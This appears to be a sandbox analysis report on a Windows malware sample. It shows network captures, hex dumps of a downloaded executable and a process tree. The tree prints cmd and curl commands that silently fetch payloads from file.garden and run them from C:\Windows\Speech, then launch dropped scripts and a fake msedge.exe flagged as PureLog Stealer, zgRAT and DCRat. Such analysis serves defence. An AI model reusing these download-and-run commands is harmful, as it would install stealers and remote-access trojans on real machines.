2024-09-30 16:19:14 UTC	816	IN	HTTP/1.1 200 OK Date: Mon, 30 Sep 2024 16:19:14 GMT Content-Type: application/octet-stream Content-Length: 370176 Connection: close x-powered-by: Express access-control-allow-origin: * content-security-policy: default-src file.garden linkh.at data: mediastream: blob: 'unsafe-inline' 'unsafe-eval' last-modified: Sun, 22 Sep 2024 19:01:04 GMT Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 681397 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F3uM7MGcAJDKOrvK3%2BhjkHsJzM2184K41zt78gAB8IEACMKtXK%2FOg8q6LgVi%2BD7Cn0YYHqpkS7N6s80QCw70z9oT53B5al1K3cLvmtyejt6XJFJW8XRd3Brtk31fgw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb58890c9324328-EWR
2024-09-30 16:19:14 UTC	553	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 aa 57 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 9c 05 00 00 08 00 00 00 00 00 00 be bb 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELWf @ `
2024-09-30 16:19:14 UTC	1369	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f 39 6d 95 5b 1c e7 2e 7b bf 94 a8 e9 8e 56 e9 5f 41 b3 ac 5f e4 ac 13 58 c3 bf b8 5b 6d 93 27 cd e6 23 51 f2 b8 9f 1c 93 a1 8d dd 2e 5b ca d0 8d 2b 48 f0 3c fc 85 66 5a f5 10 7c e6 ca aa 13 03 07 6d 26 d3 2e 1d a0 19 bf 79 aa bb 3b 4b 52 05 a6 94 af 37 a1 e7 53 c2 c0 6b 93 6d 3f f3 b7 38 08 a7 49 44 26 de 21 30 25 4e 21 5c 01 5c 06 cb 4c 5e 1e 1b cd 88 30 5c 11 b1 df cf 02 6a 7c a1 4d 85 ac fa af 1f 8a 8c 0f eb 4d ab 3b db 2a 86 71 ff b7 55 4f fa e8 21 27 b3 f3 25 2e 20 64 ba 45 ee 75 97 cb 8a 83 ea ee d2 51 2d 77 d4 a5 24 49 01 be e9 58 8f df d0 30 64 10 b5 f9 06 ea 88 a4 eb 9f 66 bd 24 7c 28 09 67 45 a9 4e 10 89 8c 33 a0 4a 99 0d 2a 54 Data Ascii: 9m[.{V_A_X[m'#Q.[+H<fZ\|m&.y;KR7Skm?8ID&!0%N!\\L^0\j\|MM;qUO!'%. dEuQ-w$IX0df$\|(gEN3JT
2024-09-30 16:19:14 UTC	1369	IN	Data Raw: a6 cf c2 32 1f a5 ff 5b 35 43 95 d0 93 a5 1d a0 c3 58 22 2c a4 8d eb c5 fb 07 a9 8c df 5f f7 3a 6b 24 02 f0 81 4a 34 0a bb 38 51 98 33 fa 65 0b 92 ff ae 2c c0 7c 6b 10 c6 53 66 e5 bd 95 5e 9e e7 4f 4d 77 1b 9f e6 d6 81 bd fd d1 7a ea 2d 8a f4 43 c6 c2 51 d2 6c 6c fa 8a f1 c2 1a c5 e5 40 96 c2 58 1b 78 42 71 52 38 56 21 63 6c c4 84 06 d5 0a 09 01 80 fb 8c ee 9d 40 14 bc d6 47 4b a8 ca c3 14 80 32 95 6c 0e f9 bf 9d 42 e4 df 07 88 e3 17 54 d4 eb 1f 8d fc fb 25 b2 aa 14 da ed 36 3e 13 c6 03 cb 68 dc 6b 69 86 6f bb b7 df 52 21 f8 a0 d8 79 dd f8 77 d5 8b 01 5a c2 cc 90 80 f0 bc b5 7b bc 30 3c bc 54 2c bc 22 03 9e 29 a1 f5 4a d4 54 08 f4 e9 58 f9 89 ca 72 b3 26 56 3d 3b 0d 3d e4 13 b4 4f ff ec ca de ec e9 38 17 7b be 01 fc fb 2f 3e e0 25 b2 a7 1d 38 f3 f5 0a f5 Data Ascii: 2[5CX",_:k$J48Q3e,\|kSf^OMwz-CQll@XxBqR8V!cl@GK2lBT%6>hkioR!ywZ{0<T,")JTXr&V=;=O8{/>%8
2024-09-30 16:19:14 UTC	1369	IN	Data Raw: 73 de f9 d8 b9 97 ee d9 92 7d 3e c4 20 3a b4 ef 3f 15 dd f7 b7 8f cf 6d 91 51 45 42 e7 d4 5f d8 c4 0c 7c e9 fb f3 db 4f bb fe 99 be ed ae 68 51 b5 c1 77 4f e5 0e 85 dd 21 aa 19 5e 53 de 6a d4 6d 55 c1 54 09 09 8f 24 26 51 79 d7 75 7f db c2 b9 80 3c a9 a0 a9 a2 70 ec e2 35 36 cd 8d 62 94 1a 29 c5 91 4f 66 f5 51 d8 38 d2 15 c0 e2 7d 85 38 ec 10 4f 7e 17 29 56 5c b7 7f f2 05 74 78 ab 7d d9 d6 08 40 c1 10 bf c9 f0 cd 7f e3 91 29 3d 26 4c 52 4f b5 56 07 91 05 b8 a8 5f 80 bc 75 88 1b 80 26 17 21 df e3 fb 96 1c 59 3a 69 39 0b f3 ea 2a 51 28 ff 5c b0 a9 b3 bb de 18 a9 c7 56 89 d3 9b aa a3 e4 50 b4 ba 0f 90 bc 42 ac be b7 86 c2 b5 be 9c 76 11 87 f6 46 d2 59 28 4c a3 78 5f 77 ab e6 ae e2 b3 9d ee 08 d2 e1 90 44 7b e6 a2 ba 8a 00 91 c5 71 c7 ca 5d 50 7e aa b6 63 87 Data Ascii: s}> :?mQEB_\|OhQwO!^SjmUT$&Qyu<p56b)OfQ8}8O~)V\tx}@)=&LROV_u&!Y:i9*Q(\VPBvFY(Lx_wD{q]P~c
2024-09-30 16:19:14 UTC	1369	IN	Data Raw: db 13 c2 e3 5f 0f 28 43 ce 78 12 84 32 75 5d 67 61 3c b1 30 99 eb 62 5f f5 ce 44 19 f7 9e 6d 03 72 57 32 55 f6 bb 09 c5 f5 dc 74 09 cb 53 22 20 0b 38 f6 45 fd 98 35 71 18 c7 ae 85 5a b2 a3 9d ca e1 74 b9 2c 38 46 12 80 7a 12 69 58 c8 70 ba bc 0a 2d 1e 45 36 ce d2 8b 70 53 7e 20 ec 34 31 78 04 fe 8a 18 6e f8 ac b8 89 ff 37 50 e4 bc c6 ae 3b bd e1 8b 5f f2 cf 48 37 03 e3 5e b0 99 0a fc f1 0c c6 71 b8 61 bc 40 30 a8 32 48 80 c9 79 28 a8 e6 23 e6 ce 51 a8 4d b8 43 82 cf ec 82 6b 2f fd 16 b1 42 db 64 5d 91 b4 8d 5d 02 a0 54 a9 04 cd 1b 18 09 86 07 0b d8 79 34 0d ea 9e 67 aa 2f 84 48 3c c7 e3 4e ff fa 02 89 6c a1 f2 e5 35 78 62 2d f2 74 05 c4 6c 2e e0 39 5c c0 e1 b1 e8 92 43 fe ba 0f 24 99 79 3f 57 dd 01 c3 7d 15 e4 a1 c8 40 5d 17 e3 f9 da 2b e2 6a 04 70 2d da Data Ascii: _(Cx2u]ga<0b_DmrW2UtS" 8E5qZt,8FziXp-E6pS~ 41xn7P;_H7^qa@02Hy(#QMCk/Bd]]Ty4g/H<Nl5xb-tl.9\C$y?W}@]+jp-
2024-09-30 16:19:14 UTC	1369	IN	Data Raw: 95 ba 47 9a 42 3b c2 38 5b 0d d5 23 a7 ed 53 cd ad 7f 5b 54 8e 86 00 b4 96 ee 53 43 ee 85 90 aa 8d 74 38 57 58 fe 24 b8 00 30 95 3c 4e 10 74 29 7a 22 be df d5 50 1e ba 4b bb f7 a6 73 c4 b4 ac 88 37 ec bb 69 8c da c0 5f f9 07 4e 93 37 ca 97 ec d5 ae 44 d1 88 72 e4 a1 8b 09 f6 ef b8 a5 55 60 50 f3 c4 a4 3b 19 c1 57 7b 18 70 8a 80 c6 ed 1f 1f 87 cb fe 9b e9 9b f3 e7 3a 9d 86 36 65 23 04 74 33 a1 ff 0d fc 64 b3 8c a0 cd 4f 3d 12 c7 a5 61 09 85 d7 5b d3 a2 13 08 46 40 ea 3f 82 ff 89 f7 66 30 aa 12 0c cc 8d 86 54 a6 5f 5c f6 53 76 4d ca 8c da 1d eb 63 b9 0e c7 65 a9 78 f1 31 33 40 6a fa 95 8c c9 ad 98 8b e9 e0 27 9d 9e 6e d9 42 d1 ae a6 7b 2e 5b 25 d8 13 d0 ee a3 d3 fe 89 77 fc bd 93 5a bd 72 a9 4e 2a cf 1e 96 85 1b d0 82 ea 04 dc f2 3e 36 15 ad 97 5a f9 ff 8d Data Ascii: GB;8[#S[TSCt8WX$0<Nt)z"PKs7i_N7DrU`P;W{p:6e#t3dO=a[F@?f0T_\SvMcex13@j'nB{.[%wZrN*>6Z
2024-09-30 16:19:14 UTC	1369	IN	Data Raw: ae 9b 33 8e da 2c 8f cd 05 db 65 80 ec 7a 7d 93 eb 70 e9 a7 88 2d 10 90 61 90 bb 00 94 84 e5 c7 98 27 c5 0e 75 a6 98 05 03 7a f5 5e 6c d0 54 fc 36 f8 c7 26 ae 1c 53 3a e2 de 31 97 91 67 c6 3c 2f 47 b8 4b 17 9f 70 01 93 92 a1 e6 0f 88 b3 d8 d3 2c 56 d6 fe f3 7a 98 e0 33 39 b4 43 fb a3 e8 11 4c 57 ad 59 86 68 03 88 a4 bd 93 44 5c b9 bb 4b af bb 47 21 96 fe 97 60 1f 98 67 35 89 f1 5c dd b4 65 e3 09 a6 1a a8 d8 5a c5 30 5f 9e 04 6b ec 2f 70 03 1e 33 f8 88 ec 77 97 c3 a4 2e 0e f7 fc 83 18 8b e3 99 37 8b 4a b1 36 d7 23 5a 35 a7 51 cb b8 a9 52 e4 3d c9 05 5e 26 95 e5 c8 39 37 f8 f5 e0 0c 58 cb 23 8c 73 47 b8 f4 fa e6 fb 60 21 11 bd 12 de 17 b3 b8 b6 26 4d d7 80 3c 7e f4 f7 c5 b6 d8 7d a5 6d 14 b7 d8 58 eb 8f 7f f0 29 43 73 5f e3 66 34 b3 7d 6a 56 cb 03 97 dc 95 Data Ascii: 3,ez}p-a'uz^lT6&S:1g</GKp,Vz39CLWYhD\KG!`g5\eZ0_k/p3w.7J6#Z5QR=^&97X#sG`!&M<~}mX)Cs_f4}jV
2024-09-30 16:19:14 UTC	1369	IN	Data Raw: 77 3c 67 d8 fd 78 fb a4 4a 66 99 b7 53 7b ab 06 7e 5a 05 99 c0 73 8c 4e 9a 7f e0 a9 b8 bb 14 a6 a8 5c 1a a0 70 56 77 95 cb 60 ea f7 bd 64 a8 ad ed 88 06 bb 5b 72 ee d7 a1 63 0c c0 b6 e0 94 e1 89 45 44 62 8f 3d a8 94 a1 e7 09 42 7c 41 33 28 c6 58 3d 1d da 3f e7 7b 49 70 e7 35 60 9f 9b 87 44 53 df 66 84 31 6a ee 36 26 46 b0 56 9e c8 fb 80 f2 ca b0 63 9b 0d 09 0b 4e 91 13 12 49 99 55 15 a3 9d 4d 82 75 63 d2 30 d5 c5 09 a7 84 19 fe bc 83 9e e6 4d 65 a2 3f 84 12 43 c6 a8 38 32 73 41 50 39 92 3f 92 ce 36 d4 69 d5 e5 32 cf 30 46 44 1f 74 23 d4 43 b8 34 1d 3f 70 41 e9 7c e1 92 79 a3 55 73 6d 6a 8d 65 7c 11 5c 0e 3c f1 7f 8d bb bb 5f 0b da fd c8 74 09 64 d8 20 c1 d3 24 7d 84 64 34 cd fe 4e 6c af 36 fe 81 2a 0b f1 19 ac 66 a3 ad 8f e9 b1 09 d3 d4 94 e6 63 89 1f 5f Data Ascii: w<gxJfS{~ZsN\pVw`d[rcEDb=B\|A3(X=?{Ip5`DSf1j6&FVcNIUMuc0Me?C82sAP9?6i20FDt#C4?pA\|yUsmje\|\<_td $}d4Nl6*fc_
2024-09-30 16:19:14 UTC	1369	IN	Data Raw: c6 39 41 c4 21 cd 72 e1 17 34 2f 56 df 2b d7 80 70 53 e2 5f 70 18 8b 55 25 32 1a 39 0b 05 fb 5c 9a 55 a5 3f 8a 3b da 24 81 58 a3 8a ad 79 c7 8c e4 c2 21 9f 3e 1f 46 66 e1 ff 39 d9 33 82 52 a4 b1 4b a6 e1 ea 7a 06 56 3c 2a bb ec 8c d3 3a 65 c9 90 79 ab cf 79 7d b5 8d d9 56 c2 98 b3 54 5a 5a 3d 2c 24 eb 0c 12 47 7a 2a 5c b7 64 e1 ee 3e 76 7b bc eb 66 23 88 d0 2a ef 2f cb 4b 5e 66 5f 47 f4 ba a6 81 78 3a a6 5d 97 0c 3a ff 2e c9 51 e4 b5 d5 3a 7e 3c f1 26 eb ec 98 a2 b4 83 9c 3f 21 20 2e 13 a1 f2 da 4b 3d f4 2c f3 72 e8 eb 50 33 e4 ef 1e 1a 92 bb 48 1c da a3 36 34 b2 eb 90 4e af 06 bc 31 da ea 38 8d 15 d1 85 5d 52 6e 0b 99 9a a1 3c b6 6d 53 3f ad 6f 64 a3 f4 95 fa 0d 9c ab 44 37 03 53 68 f0 8f c3 56 5e 4a 41 81 ff 4b 93 f4 56 6a cd 5c 7e 19 a7 90 8a 89 65 d3 Data Ascii: 9A!r4/V+pS_pU%29\U?;$Xy!>Ff93RKzV<:eyy}VTZZ=,$Gz\d>v{f#*/K^f_Gx:]:.Q:~<&?! .K=,rP3H64N18]Rn<mS?odD7ShV^JAKVj\~e
2024-09-30 16:19:14 UTC	1369	IN	Data Raw: 88 2f e9 2e bc d8 05 68 d8 da f5 21 9f a7 4c a0 33 85 79 90 91 bd 38 73 36 7d 2a d6 a9 8a 2e 5e 35 6b 60 d7 49 b9 f9 9b 04 ce 38 5b de b3 1c 04 1f 5d e5 f0 2d e8 5c ae ef 28 57 2f 89 1e d5 5b da 3a 3d 16 58 6f 5f 40 af 93 12 92 0b 71 c6 87 b4 b6 88 a7 24 87 22 97 47 9d 38 9d a8 d2 74 8b aa cb c0 ff cc 05 fc 0d 78 25 72 3a 80 32 16 d0 59 2d dd 4e 6f 73 b1 cf 53 6d e5 25 8e 0a 41 5e ff 54 32 e0 3c 2f 7c aa f0 7f c1 4c 7c 5b 9c 08 c1 8c fb 32 7d c4 01 de 63 72 22 44 0a 65 4e bf 18 29 d7 76 bd 76 5f 91 65 48 2a 8b a9 ec 34 e3 6a 6e f5 bf 6d 13 83 9a 24 ef 95 57 53 10 c8 9d ca fb 5f 6b ff b5 07 a8 aa 35 a1 63 95 a4 f3 03 b1 9e 3a 11 54 d2 e6 95 ea 69 d4 4e 53 93 fe e1 e5 52 6a d5 58 f2 90 2a 27 12 cf 54 44 d4 08 b2 ce 94 7c c2 af fd 4b 7b e0 ea d9 ed 33 b5 05 Data Ascii: /.h!L3y8s6}.^5k`I8[]-\(W/[:=Xo_@q$"G8tx%r:2Y-NosSm%A^T2</\|L\|[2}cr"DeN)vv_eH4jnm$WS_k5c:TiNSRjX*'TD\|K{3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49710	104.102.49.254	443	3724	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-30 16:19:17 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-09-30 16:19:18 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Mon, 30 Sep 2024 16:19:18 GMT Content-Length: 25330 Connection: close Set-Cookie: sessionid=073c0f50b0055e8b4643c583; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-30 16:19:18 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-30 16:19:18 UTC	10816	IN	Data Raw: 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 62 75 6c 67 61 72 69 61 6e 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 62 75 6c 67 61 72 69 61 6e 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e d0 91 d1 8a d0 bb d0 b3 d0 b0 d1 80 d1 81 d0 ba d0 b8 20 28 42 75 6c 67 61 72 69 61 6e 29 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 63 7a 65 63 68 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 63 7a 65 63 68 27 20 29 3b 20 72 65 74 Data Ascii: ss="popup_menu_item tight" href="?l=bulgarian" onclick="ChangeLanguage( 'bulgarian' ); return false;"> (Bulgarian)</a><a class="popup_menu_item tight" href="?l=czech" onclick="ChangeLanguage( 'czech' ); ret

Target ID:	0
Start time:	12:19:07
Start date:	30/09/2024
Path:	C:\Users\user\Desktop\seoI30IZZr.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\seoI30IZZr.exe"
Imagebase:	0x7ff7865e0000
File size:	637'952 bytes
MD5 hash:	D0E53E2A0BEF6C93E0CCAD47A650079D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	12:19:07
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	12:19:09
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
Imagebase:	0x7ff6aade0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:19:09
Start date:	30/09/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exe
Imagebase:	0x7ff72b520000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:19:12
Start date:	30/09/2024
Path:	C:\Windows\Speech\kdmapper.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Speech\kdmapper.exe"
Imagebase:	0x600000
File size:	2'284'739 bytes
MD5 hash:	C85ABE0E8C3C4D4C5044AEF6422B8218
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000003.1497197770.000000000696D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000003.1497756532.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\Speech\kdmapper.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 68%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	12:19:12
Start date:	30/09/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
Imagebase:	0x7ff6aade0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:19:12
Start date:	30/09/2024
Path:	C:\Windows\System32\curl.exe
Wow64 process (32bit):	false
Commandline:	curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exe
Imagebase:	0x7ff72b520000
File size:	530'944 bytes
MD5 hash:	EAC53DDAFB5CC9E780A7CC086CE7B2B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:19:13
Start date:	30/09/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe"
Imagebase:	0x840000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	12:19:14
Start date:	30/09/2024
Path:	C:\Windows\Speech\physmeme.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Speech\physmeme.exe"
Imagebase:	0xb10000
File size:	370'176 bytes
MD5 hash:	D6EDF37D68DA356237AE14270B3C7A1A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 61%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:19:14
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:19:15
Start date:	30/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x2f0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:19:15
Start date:	30/09/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xce0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	12:19:28
Start date:	30/09/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	12:19:28
Start date:	30/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	12:19:28
Start date:	30/09/2024
Path:	C:\Edge\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Edge/msedge.exe"
Imagebase:	0x120000
File size:	1'963'008 bytes
MD5 hash:	ABD343DF6FBD7334D617F76F6F050E3C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000010.00000000.1654958130.0000000000122000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.1726451234.0000000012879000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Edge\msedge.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Edge\msedge.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	12:19:31
Start date:	30/09/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.cmdline"
Imagebase:	0x7ff67ed10000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
